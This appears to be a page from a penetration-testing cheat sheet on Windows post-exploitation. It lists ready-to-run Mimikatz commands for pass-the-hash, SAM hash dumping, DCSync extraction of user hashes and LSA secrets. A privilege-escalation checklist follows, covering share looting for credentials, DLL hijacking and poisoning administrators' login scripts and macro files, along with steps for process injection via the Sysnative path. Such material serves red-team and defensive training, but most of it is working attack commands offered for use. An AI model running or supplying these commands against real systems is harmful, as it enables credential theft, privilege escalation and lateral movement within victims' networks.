Skip to main content

Table Of Contents

  • Post Exploitation
    • Mimikatz Credential Manipulation
    • Windows Privilege Escalation Checklist
    • File System Redirection

POST EXPLOITATION

  • Note: This section details various post exploitation tools and techniques such as mimikatz, PsExec, privilege escalation tactics, file system redirection, etc.

MIMIKATZ CREDENTIAL MANIPULATION

Mimikatz PTH (Runs specified binary with PTH credentials). Must be run as SYSTEM

mimikatz.exe "sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:<FILE_PATH>" exit

Mimikatz hashdump. Must be run as SYSTEM

mimikatz.exe "lsadump::sam" exit

PTH with AES128/256 bit keys. AES128/256 bit keys can be obtained via DCSync

mimikatz.exe sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /aes128:<aes128_HASH> /aes256:<aes256_HASH>

Extract domain SID from Active Directory object

wmic group where name="Domain Admins" get name,sid,domain
:: or reg query HKU to retrieve logged in domain user SIDs (which contain domain SID)
:: Result of above commands: S-1-5-21-520640528-869697576-4233872597-1532
:: The Domain SID Portion is: S-1-5-21-520640528-869697576-4233872597

Remote dump hash for specific user account -- (Administrators, Domain Admins, or Enterprise Admins are able to remotely DCSync)

mimikatz.exe "lsadump::dcsync /domain:<DOMAIN_FQDN> /user:<USERNAME>"

Get the SysKey to decypt SECRETS entries (from registry or hives)

mimikatz.exe “lsadump::secrets”

WINDOWS PRIVILEGE ESCALATION CHECKLIST

  • More info at: https://github.com/GhostPack/SharpUp

  • Step-1: Enumerate all File Servers in a domain and net view to find open shares.

    • Once all shares are located, enumerate all share files/folders for sensitive data such as: administrative info, credentials, user home directories, etc.
    • Repeat against other systems in the domain (other server roles like database, web, etc.) which may have misconfigured network shares exposing sensitive data.

  • Step-2: Enumerate PATH and then .DLL hijack (wlbsctrl or scheduler) if applicable.

  • Step-3: Run open-source tool "SharpUp" to enumerate potential privilege escalation opportunities such as vulnerable paths, weak service information, and more.

  • Step-4: Enumerate startup folder, user scheduled tasks, etc. Attempt to poison global shared scripts set to run at login.

  • Step-5: Gain access to administrative shares and attempt to poison scripts run by administrators or macro enabled files.

FILE SYSTEM REDIRECTION

  • Notes:
    • File System Redirection - > Jump to x64 process from x86
    • Execute x64 binary: C:\Windows\Sysnative\upnpcont.exe
    • Use tasklist to list processes and find the PID of the process that was launched 
      tasklist /v | findstr upnpcont
    • Inject into PID discovered in previous step
    • Exit original x86 process